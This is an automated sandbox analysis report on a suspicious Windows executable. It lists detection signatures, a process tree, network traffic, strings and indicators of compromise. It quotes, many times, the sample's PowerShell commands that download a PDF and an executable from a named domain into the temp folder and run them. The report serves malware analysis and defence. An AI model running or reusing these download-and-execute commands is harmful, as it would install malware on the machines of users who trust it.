
Windows Analysis Report
lg1wwLsmCX.exe

Overview

General Information

Sample name: lg1wwLsmCX.exe (renamed because original name is a hash value)
Original sample name: aa278fedf75ca629997113488d789e91f73a275575c22194c7bf7d59b30c9bc9.exe
Analysis ID: 1570132
MD5: 1ceb5d0cb063290c1f66fccfed96a220
SHA1: 09b735e87dd4ef4917d2e1bcd969408c3ac099fd
SHA256: aa278fedf75ca629997113488d789e91f73a275575c22194c7bf7d59b30c9bc9
Tags: badlarrysguitars-com, exe, user-JAMESWT_MHT

Detection

Score: 52
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

AI detected suspicious sample
Machine Learning detection for sample
Suspicious powershell command line found
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Enables debug privileges
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sigma detected: PowerShell Web Download
Sigma detected: Usage Of Web Request Commands And Cmdlets
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • lg1wwLsmCX.exe (PID: 7712 cmdline: "C:\Users\user\Desktop\lg1wwLsmCX.exe" MD5: 1CEB5D0CB063290C1F66FCCFED96A220)
    • powershell.exe (PID: 7740 cmdline: powershell.exe -c Invoke-WebRequest -Uri "https://badlarrysguitars.com/share/alert.pdf" -OutFile (Join-Path ([System.IO.Path]::GetTempPath()) "alert.pdf"); Start-Process (Join-Path ([System.IO.Path]::GetTempPath()) "alert.pdf") MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7768 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • Acrobat.exe (PID: 8088 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Local\Temp\alert.pdf" MD5: 24EAD1C46A47022347DC0F05F6EFBB8C)
        • AcroCEF.exe (PID: 4028 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
          • AcroCEF.exe (PID: 3472 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2104 --field-trial-handle=1768,i,14827826412355596552,2148674683166230216,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
    • powershell.exe (PID: 9188 cmdline: powershell.exe -c Invoke-WebRequest -Uri "https://badlarrysguitars.com/private/nois.exe" -OutFile (Join-Path ([System.IO.Path]::GetTempPath()) "ctfmoon.exe"); Start-Process (Join-Path ([System.IO.Path]::GetTempPath()) "ctfmoon.exe") MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 9196 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • svchost.exe (PID: 7304 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup
No configs have been found
No yara matches
Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: powershell.exe -c Invoke-WebRequest -Uri "https://badlarrysguitars.com/share/alert.pdf" -OutFile (Join-Path ([System.IO.Path]::GetTempPath()) "alert.pdf"); Start-Process (Join-Path ([System.IO.Path]::GetTempPath()) "alert.pdf"), CommandLine: powershell.exe -c Invoke-WebRequest -Uri "https://badlarrysguitars.com/share/alert.pdf" -OutFile (Join-Path ([System.IO.Path]::GetTempPath()) "alert.pdf"); Start-Process (Join-Path ([System.IO.Path]::GetTempPath()) "alert.pdf"), CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\lg1wwLsmCX.exe", ParentImage: C:\Users\user\Desktop\lg1wwLsmCX.exe, ParentProcessId: 7712, ParentProcessName: lg1wwLsmCX.exe, ProcessCommandLine: powershell.exe -c Invoke-WebRequest -Uri "https://badlarrysguitars.com/share/alert.pdf" -OutFile (Join-Path ([System.IO.Path]::GetTempPath()) "alert.pdf"); Start-Process (Join-Path ([System.IO.Path]::GetTempPath()) "alert.pdf"), ProcessId: 7740, ProcessName: powershell.exe
Source: Process started; Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger; Data: Command: powershell.exe -c Invoke-WebRequest -Uri "https://badlarrysguitars.com/share/alert.pdf" -OutFile (Join-Path ([System.IO.Path]::GetTempPath()) "alert.pdf"); Start-Process (Join-Path ([System.IO.Path]::GetTempPath()) "alert.pdf"), CommandLine: powershell.exe -c Invoke-WebRequest -Uri "https://badlarrysguitars.com/share/alert.pdf" -OutFile (Join-Path ([System.IO.Path]::GetTempPath()) "alert.pdf"); Start-Process (Join-Path ([System.IO.Path]::GetTempPath()) "alert.pdf"), CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\lg1wwLsmCX.exe", ParentImage: C:\Users\user\Desktop\lg1wwLsmCX.exe, ParentProcessId: 7712, ParentProcessName: lg1wwLsmCX.exe, ProcessCommandLine: powershell.exe -c Invoke-WebRequest -Uri "https://badlarrysguitars.com/share/alert.pdf" -OutFile (Join-Path ([System.IO.Path]::GetTempPath()) "alert.pdf"); Start-Process (Join-Path ([System.IO.Path]::GetTempPath()) "alert.pdf"), ProcessId: 7740, ProcessName: powershell.exe
Source: Process started; Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements); Data: Command: powershell.exe -c Invoke-WebRequest -Uri "https://badlarrysguitars.com/share/alert.pdf" -OutFile (Join-Path ([System.IO.Path]::GetTempPath()) "alert.pdf"); Start-Process (Join-Path ([System.IO.Path]::GetTempPath()) "alert.pdf"), CommandLine: powershell.exe -c Invoke-WebRequest -Uri "https://badlarrysguitars.com/share/alert.pdf" -OutFile (Join-Path ([System.IO.Path]::GetTempPath()) "alert.pdf"); Start-Process (Join-Path ([System.IO.Path]::GetTempPath()) "alert.pdf"), CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\lg1wwLsmCX.exe", ParentImage: C:\Users\user\Desktop\lg1wwLsmCX.exe, ParentProcessId: 7712, ParentProcessName: lg1wwLsmCX.exe, ProcessCommandLine: powershell.exe -c Invoke-WebRequest -Uri "https://badlarrysguitars.com/share/alert.pdf" -OutFile (Join-Path ([System.IO.Path]::GetTempPath()) "alert.pdf"); Start-Process (Join-Path ([System.IO.Path]::GetTempPath()) "alert.pdf"), ProcessId: 7740, ProcessName: powershell.exe
Source: Process started; Author: vburov; Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 620, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 7304, ProcessName: svchost.exe
No Suricata rule has matched


AV Detection

Source: Submitted Sample; Integrated Neural Analysis Model: Matched 96.3% probability
Source: lg1wwLsmCX.exe; Joe Sandbox ML: detected
Source: unknown; HTTPS traffic detected: 101.99.75.174:443 -> 192.168.2.10:49709 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 101.99.75.174:443 -> 192.168.2.10:49806 version: TLS 1.2
Source: Binary string: softy.pdb; source: powershell.exe, 00000010.00000002.1841523083.000002BB1BD6E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdb; source: powershell.exe, 00000010.00000002.1842069784.000002BB1BE05000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Microsoft.PowerShell.Commands.Management.resourcesn.pdb^; source: powershell.exe, 00000010.00000002.1841523083.000002BB1BD81000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: n.pdb6; source: powershell.exe, 00000010.00000002.1841523083.000002BB1BD81000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: rlib.pdb; source: powershell.exe, 00000010.00000002.1842069784.000002BB1BE05000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: Joe Sandbox View; IP Address: 54.224.241.105
Source: Joe Sandbox View; ASN Name: SHINJIRU-MY-AS-APShinjiruTechnologySdnBhdMY
Source: Joe Sandbox View; JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: global traffic; HTTP traffic detected: GET /share/alert.pdf HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 | Host: badlarrysguitars.com | Connection: Keep-Alive
Source: global traffic; HTTP traffic detected: GET /psdk/v2/content?surfaceId=ACROBAT_READER_MASTER_SURFACEID&surfaceId=DC_READER_LAUNCH_CARD&surfaceId=DC_Reader_RHP_Banner&surfaceId=DC_Reader_RHP_Retention&surfaceId=Edit_InApp_Aug2020&surfaceId=DC_FirstMile_Right_Sec_Surface&surfaceId=DC_Reader_Upsell_Cards&surfaceId=DC_FirstMile_Home_View_Surface&surfaceId=DC_Reader_RHP_Intent_Banner&surfaceId=DC_Reader_Disc_LHP_Banner&surfaceId=DC_Reader_Edit_LHP_Banner&surfaceId=DC_Reader_Convert_LHP_Banner&surfaceId=DC_Reader_Sign_LHP_Banner&surfaceId=DC_Reader_More_LHP_Banner&surfaceId=DC_Reader_Disc_LHP_Retention&surfaceId=DC_Reader_Home_LHP_Trial_Banner&adcProductLanguage=en-us&adcVersion=23.6.20320&adcProductType=SingleClientMini&adcOSType=WIN&adcCountryCode=US&adcXAPIClientID=api_reader_desktop_win_23.6.20320&encodingScheme=BASE_64 HTTP/1.1 | Host: p13n.adobe.io | Connection: keep-alive | sec-ch-ua: "Chromium";v="105" | sec-ch-ua-mobile: ?0 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) ReaderServices/23.6.20320 Chrome/105.0.0.0 Safari/537.36 | Accept: application/json, text/javascript, */*; q=0.01 | x-adobe-uuid: 79164422-1e43-4f8b-9b29-d5ef60e753c7 | x-adobe-uuid-type: visitorId | x-api-key: AdobeReader9 | sec-ch-ua-platform: "Windows" | Origin: https://rna-resource.acrobat.com | Accept-Language: en-US,en;q=0.9 | Sec-Fetch-Site: cross-site | Sec-Fetch-Mode: cors | Sec-Fetch-Dest: empty | Referer: https://rna-resource.acrobat.com/ | Accept-Encoding: gzip, deflate, br
Source: global traffic; HTTP traffic detected: GET /private/nois.exe HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 | Host: badlarrysguitars.com | Connection: Keep-Alive
Source: unknown; TCP traffic detected without corresponding DNS query: 54.224.241.105 (11 occurrences)
Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1 (2 occurrences)
Source: global traffic; DNS traffic detected: DNS query: badlarrysguitars.com
Source: global traffic; DNS traffic detected: DNS query: x1.i.lencr.org
Source: powershell.exe, 00000005.00000002.1646173609.000001FDB4BDF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1781877654.000002B303E97000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://badlarrysguitars.com
Source: lg1wwLsmCX.exe; String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: lg1wwLsmCX.exe; String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: lg1wwLsmCX.exe; String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: lg1wwLsmCX.exe; String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: powershell.exe, 00000005.00000002.1665596061.000001FDCB66C000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://crl.micronW
Source: svchost.exe, 00000009.00000002.3011261258.0000028FC0A00000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://crl.ver)
Source: lg1wwLsmCX.exe; String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: lg1wwLsmCX.exe; String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: lg1wwLsmCX.exe; String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: lg1wwLsmCX.exe; String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: lg1wwLsmCX.exe; String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
Source: 77EC63BDA74BD0D0E0426DC8F80085060.8.dr; String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: qmgr.db.9.dr; String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
Source: qmgr.db.9.dr; String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
Source: qmgr.db.9.dr; String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
Source: qmgr.db.9.dr; String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
Source: qmgr.db.9.dr; String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
Source: qmgr.db.9.dr; String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
Source: qmgr.db.9.dr; String found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
Source: powershell.exe, 00000005.00000002.1661276426.000001FDC3323000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1661276426.000001FDC3466000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1646173609.000001FDB4CB0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1828727225.000002B3125E5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1828727225.000002B312727000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://nuget.org/NuGet.exe
Source: lg1wwLsmCX.exe; String found in binary or memory: http://ocsp.digicert.com0
Source: lg1wwLsmCX.exe; String found in binary or memory: http://ocsp.digicert.com0A
Source: lg1wwLsmCX.exe; String found in binary or memory: http://ocsp.digicert.com0C
Source: lg1wwLsmCX.exe; String found in binary or memory: http://ocsp.digicert.com0X
Source: powershell.exe, 00000010.00000002.1781877654.000002B3027A2000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000005.00000002.1646173609.000001FDB32B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1781877654.000002B302571000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000010.00000002.1781877654.000002B3027A2000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: lg1wwLsmCX.exe; String found in binary or memory: http://www.digicert.com/CPS0
Source: powershell.exe, 00000005.00000002.1665556842.000001FDCB4E0000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://www.microsoft.co
Source: 2D85F72862B55C4EADD9E66E06947F3D0.8.dr; String found in binary or memory: http://x1.i.lencr.org/
Source: powershell.exe, 00000005.00000002.1646173609.000001FDB32B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1781877654.000002B302571000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000005.00000002.1646173609.000001FDB4444000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1781877654.000002B3036FF000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://badlarrysguitars.com
Source: powershell.exe, 00000010.00000002.1781877654.000002B303EC4000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://badlarrysguitars.com/pri
Source: lg1wwLsmCX.exe; String found in binary or memory: https://badlarrysguitars.com/private/nois.exe
Source: powershell.exe, 00000010.00000002.1780240680.000002B300650000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1781632613.000002B3009A0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1781527537.000002B300900000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1840770157.000002B31B0F0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1780240680.000002B3006E2000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1842632807.000002BB1BE2A000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://badlarrysguitars.com/private/nois.exe-OutFile(Join-Path(
Source: lg1wwLsmCX.exe; String found in binary or memory: https://badlarrysguitars.com/share/alert.pdf
Source: powershell.exe, 00000005.00000002.1645720630.000001FDB14C2000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1645586241.000001FDB13E2000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1645545243.000001FDB1370000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1665596061.000001FDCB66C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1646033280.000001FDB15D0000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://badlarrysguitars.com/share/alert.pdf-OutFile(Join-Path(
Source: powershell.exe, 00000005.00000002.1646173609.000001FDB4444000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://badlarrysguitars.comp
Source: powershell.exe, 00000010.00000002.1828727225.000002B312727000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000010.00000002.1828727225.000002B312727000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000010.00000002.1828727225.000002B312727000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://contoso.com/License
Source: edb.log.9.dr, qmgr.db.9.dr; String found in binary or memory: https://g.live.com/odclientsettings/Prod-C:
Source: svchost.exe, 00000009.00000003.1360100090.0000028FC0C50000.00000004.00000800.00020000.00000000.sdmp, edb.log.9.dr, qmgr.db.9.dr; String found in binary or memory: https://g.live.com/odclientsettings/ProdV2-C:
Source: powershell.exe, 00000010.00000002.1781877654.000002B3027A2000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000005.00000002.1646173609.000001FDB4444000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1781877654.000002B3036FF000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://go.micro
Source: powershell.exe, 00000005.00000002.1661276426.000001FDC3323000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1661276426.000001FDC3466000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1646173609.000001FDB4CB0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1828727225.000002B3125E5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1828727225.000002B312727000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://nuget.org/nuget.exe
Source: ReaderMessages.7.dr; String found in binary or memory: https://www.adobe.co
Source: unknown; Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown; Network traffic detected: HTTP traffic on port 49748 -> 443
Source: unknown; Network traffic detected: HTTP traffic on port 443 -> 49709
Source: unknown; Network traffic detected: HTTP traffic on port 49806 -> 443
Source: unknown; Network traffic detected: HTTP traffic on port 443 -> 49806
Source: unknown; Network traffic detected: HTTP traffic on port 443 -> 49748
Source: C:\Windows\System32\svchost.exe; File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
Source: lg1wwLsmCX.exe; Static PE information: invalid certificate
Source: classification engine; Classification label: mal52.winEXE@23/48@2/3
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe; File created: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SharedDataEvents-journal
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Mutant created: NULL
Source: C:\Windows\System32\conhost.exe; Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7768:120:WilError_03
Source: C:\Windows\System32\conhost.exe; Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9196:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vj1mtrgc.vzq.ps1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File read: C:\Users\desktop.ini
Source: C:\Users\user\Desktop\lg1wwLsmCX.exe; Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown; Process created: C:\Users\user\Desktop\lg1wwLsmCX.exe "C:\Users\user\Desktop\lg1wwLsmCX.exe"
Source: C:\Users\user\Desktop\lg1wwLsmCX.exe; Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -c Invoke-WebRequest -Uri "https://badlarrysguitars.com/share/alert.pdf" -OutFile (Join-Path ([System.IO.Path]::GetTempPath()) "alert.pdf"); Start-Process (Join-Path ([System.IO.Path]::GetTempPath()) "alert.pdf")
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Local\Temp\alert.pdf"
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe; Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
Source: unknown; Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe; Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2104 --field-trial-handle=1768,i,14827826412355596552,2148674683166230216,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
Source: C:\Users\user\Desktop\lg1wwLsmCX.exe; Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -c Invoke-WebRequest -Uri "https://badlarrysguitars.com/private/nois.exe" -OutFile (Join-Path ([System.IO.Path]::GetTempPath()) "ctfmoon.exe"); Start-Process (Join-Path ([System.IO.Path]::GetTempPath()) "ctfmoon.exe")
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\lg1wwLsmCX.exe; Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -c Invoke-WebRequest -Uri "https://badlarrysguitars.com/share/alert.pdf" -OutFile (Join-Path ([System.IO.Path]::GetTempPath()) "alert.pdf"); Start-Process (Join-Path ([System.IO.Path]::GetTempPath()) "alert.pdf")
Source: C:\Users\user\Desktop\lg1wwLsmCX.exe; Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -c Invoke-WebRequest -Uri "https://badlarrysguitars.com/private/nois.exe" -OutFile (Join-Path ([System.IO.Path]::GetTempPath()) "ctfmoon.exe"); Start-Process (Join-Path ([System.IO.Path]::GetTempPath()) "ctfmoon.exe")
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Local\Temp\alert.pdf"
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe; Process created: unknown unknown
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe; Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe; Process created: unknown unknown (2 occurrences)
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe; Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2104 --field-trial-handle=1768,i,14827826412355596552,2148674683166230216,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe; Process created: unknown unknown (6 occurrences)
Source: C:\Users\user\Desktop\lg1wwLsmCX.exe; Section loaded: apphelp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: appresolver.dll
